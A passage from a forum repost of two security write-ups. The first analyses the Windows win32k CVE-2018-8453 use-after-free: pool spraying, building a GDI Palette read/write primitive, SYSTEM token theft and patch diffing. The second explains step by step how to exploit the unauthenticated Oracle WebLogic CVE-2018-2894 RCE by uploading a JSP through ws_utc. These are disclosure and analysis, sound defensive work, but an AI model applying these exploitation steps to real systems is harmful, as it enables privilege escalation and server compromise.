HMAssignmentUnlock(&pSBTrack->spwndSBNotify). Continue to the next HMAssignmentUnlock(&pSBTrack->spwndSB), then take a look at the disassembly code of HMAssignmentUnlock and you will find a very interesting place: Execution of lock xadd dword ptr [rdx+8],eax will perform minus one operation to the DWORD pointed by rdx+8. After debugging the code, we figure out that pSBTrack->spwndSB is assigned to* rdx*! So, if we can control the value of pSBTrack->spwndSB, then we can perform minus one operation on any memory DWORD. pSBTrack is released after we call SendMessage(g_SBWNDNew, WM_CANCELMODE). So if we can allocate an object (such as Bitmap) with the same size as SBTrack immediately and could control the data of the object, there is a great probability that the pool get freed will be reassigned to the object. Test Results: Similarly, continue to call HMAssignmentUnlock (&pSBTrack->spwndSBTrack), there will be another arbitrary memory value minus one operation, while the memory is pointed by pSBTrack->spwndSBTrack+8. So we can reduce the arbitrary memory value by one or two through controlling the data in the Bitmap that get sprayed into the space previously used by pSBTrack. Minus one operation only requires either pSBTrack->spwndSB or pSBTrack->spwndSBTrack to be 0, and the other one to be address - sizeof(PVOID). As long as we repeatedly trigger this process, we can reduce the memory value by one or two for many times in order to change the value to a specified number. result = target - repeat_count result = target - repeat_count * 2 Obviously we have to know the original value first in order to make it reduced to the value we want. Therefore, there are some limitations when compared with setting the value directly. Hint: If we need to change 0x02000000 to 0x00000000, do we need to repeat the minus two operation for 0x01000000 times? The answer is no. Because we are able to deduct arbitrary memory DWORD value by one or two, the memory address could be adjusted to turn "0x02" into a low Byte in the DWORD. Then it becomes to change 0x00000002 to 0x00000000, here just need one loop and no need to worry about the loop count limitations. Use the GDI Palette to Achieve Arbitrary R/W Below is the documented PALETTE data structure: typedef struct _PALETTE64 { BASEOBJECT64 BaseObject; ... ULONG64 pRGBXlate; PALETTEENTRY *pFirstColor; struct _PALETTE *ppalThis; PALETTEENTRY apalColors[3]; } 1 2 3 4 5 6 7 8 9 10 Member apalColors is an array. Each member in the array is 4 bytes in size and the content can be specified by user. pFirstColor, similar to the pvScan0 pointer in the Bitmap, is pointed to the array and could be used to construct the R/W primitive. The following relationship is satisfied and by using this we can know the initial value of the memory pointed by pFirstColor: Address of PALETTEENTRY = Address of pFirstColor + sizeof(PVOID)*2 1 Similar to manipulating data in the Pixel area by Bitmap through GetBitmapBits and SetBitmapBits, PALETTE will use GetPaletteEntries and SetPaletteEntries to manipulate the data pointed by the pFirstColor. So we can construct two Palettes, named as hManager and hWorker respectively: If we can get the value of hManager's pFirstColor and hWorker's pFirstColor, then we can use the above arbitrary memory value deduction approach to reduce the hManager->pFirstColor value to the same as hWorker's pFirstColor. After that we can use hManager to call SetPaletteEntries to control hWorker->pFirstColor, then use hWorker to call SetPaletteEntries and GetPaletteEntries to achieve arbitrary memory read/write. Fortunately, we can use the following techniques to stabilize the value of hManager's pFirstColor and hWorker's pFirstColor, and make hManager's pFirstColor value not quite larger than hWorker's pFirstColor value. Use the Desktop Heap to Leak GDI Palette Address Since the name of window menu could be quite long, lpszMenuName and Palette are in the same memory pool, and we can get the kernel address of lpszMenuName through the tagWND pointer returned by HmValidateHandle, we can use the desktop heap[2] to help us predict the kernel address of the pFirstColor pointer. With proper construction, the accuracy rate could reach to 100%. First we need to repeatedly create and delete a window object to allocate and release a pit. When the address becomes unchanged, it means the next time you construct a Palette object with a size equal to lpszMenuName, the Palette object will be allocated at the address of the lpszMenuName that has just been released: Then we can get the kernel address of pFirstColor by using its offset inside _PALETTE64: hManager->pFirstColor can be changed to hWorker's pFirstColor value by using the above arbitrary deduction operation in order to achieve arbitrary memory read/write. Privilege Escalation by Arbitrary Memory R/W Since arbitrary memory read/write is available at this moment, we could enumerate EPROCESS chain to get the token value of the system process as well as the token address of the current process. Then we could perform privilege escalation by copying the token value from the system process to the current one. How to get the EPROCESS of the system at the user level? You can get it by looking up PsInitialSystemProcess[3] in ntoskrnl.exe: Code to get _EPROCES of the current process: Use arbitrary memory read/write to copy Token: Exploit Process in Summary 360 Threat Intelligence Center summarized the entire process as follows: Get the pFirstColor value of hManager and hWorker by using desktop heap leak technology Triggering the vulnerability multiple times to change the value of hManager->pFirstColor to the value of pFirstColor in hWorker Perform privilege escalation by arbitrary memory read/write Using arbitrary memory read/write to spoof the operating system not to clean up the Bitmap object. Without this step, the system will release the Bitmap object when the program gets closed. It will cause a Double Free and result in Blue Screen. Screenshot: Patch Analysis By using Bindiff, we find that IsWindowBeingDestroyed is called to check if the window has been released before setting a new FNID in the patched version of win32kfull!NtUserSetWIndowFNID. It will return directly if the window object has been released, and will not allow setting a new FNID value. So when we call DestoryWindow, we will fail to call NtSetUserWindowFNID to set FNID. The vulnerability gets fixed since this approach prevents us from releasing pSBTrack in advance. Conclusion After investigations, we come up with PoC exploit on Windows 10 pro v1709 x86/x64 and perform privilege escalation successfully when the system is not patched. For other Windows versions, only need to change offsets of corresponding data structures, such as the offset of Token inside _EPROCESS. References [1].https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/ [2].https://blogs.msdn.microsoft.com/ntdebugging/2007/01/04/desktop-heap-overview/ [3].https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/mm64bitphysicaladdress [4].https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig [5].https://www.anquanke.com/post/id/168572#h2-1 [6].https://www.anquanke.com/post/id/168441#h2-0 [7].ed2k://|file|cn_windows_10_multi-edition_vl_version_1709_updated_sept_2017_x64_dvd_100090774.iso|4630972416|8867C5E54405FF9452225B66EFEE690A|/ Sursa: https://ti.360.net/blog/articles/cve-2018-8453-win32k-elevation-of-privilege-vulnerability-targeting-the-middle-east-en/
  24. [Video] Proof of Concept: CVE-2018-2894 Oracle WebLogic RCE Kristian Bremberg/November 14, 2018 A recent vulnerability was sent in to Crowdsource affecting Oracle WebLogic Server. The vulnerability is an unauthenticated remote code execution (RCE) that is easily exploited. In this article we will go through the technical aspects of the Oracle WebLogic RCE vulnerability and its exploitation. Proof of concept video: How the exploit works: The vulnerability is affecting the Web Services (WLS) subcomponent. The path: /ws_utc/config.do(on port 7001) is by default reachable without any authentication, however this pages is only available in development mode. In order to make this vulnerability exploitable, the attacker needs to set a new Work Home Dir which has to be writable. The path: servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/cssworks for this. After the new writable Work Home Dir is sat, it is then possible to upload a JSP file in the Security tab. Image: The interface where it is possible to save a Work Home Dir which will be the path where JKS keystores will be saved. The page lets an attacker upload JKS Keystores which are Java Server Pages (JSP) files. These uploaded files are then possible to access and execute. Then it is possible to do a file upload as a multipart/form-data to the path: ws_utc/resources/setting/keystore The server will then respond with XML containing the keyStoreItem ID which is used to reach the uploaded file in the format of:/ws_utc/css/config/keystore/1582617386107_filename.jsp Image: After a successful upload of a JKS Keystore the response will contain its ID. Impact: If a hacker acts upon this vulnerability, they may be able to completely compromise the server. However, due to the test page only existing in development mode, it is very important to check that your WebLogic server is not running in development mode. In some cases the port 7001 is filtered and therefore not reachable on the Internet. For an attacker it is very easy to detect this vulnerability. WebLogic is easily fingerprinted (with its Server header) and a quick search on Shodan shows that there are many instances open on the Internet. Additional information: For the full security advisory about Orable Weblogic RCE, read more on Oracle Critical Patch Update Advisory. Log into your Detectify account to find out if your applications are vulnerable and get the remediation tips. Questions or comments? Let us know in the section below. Begin a scan for the latest vulnerabilities today. Start a free trial with Detectify here! Detectify is a continuous web scanner monitor service that can be set up for automated scanning for 1000+ known vulnerabilities including the OWASP Top 10. Check for the latest vulnerabilities! Written by Krisitian Bremberg Edited by Jocelyn Chan Sursa: https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/
×
×
  • Create New...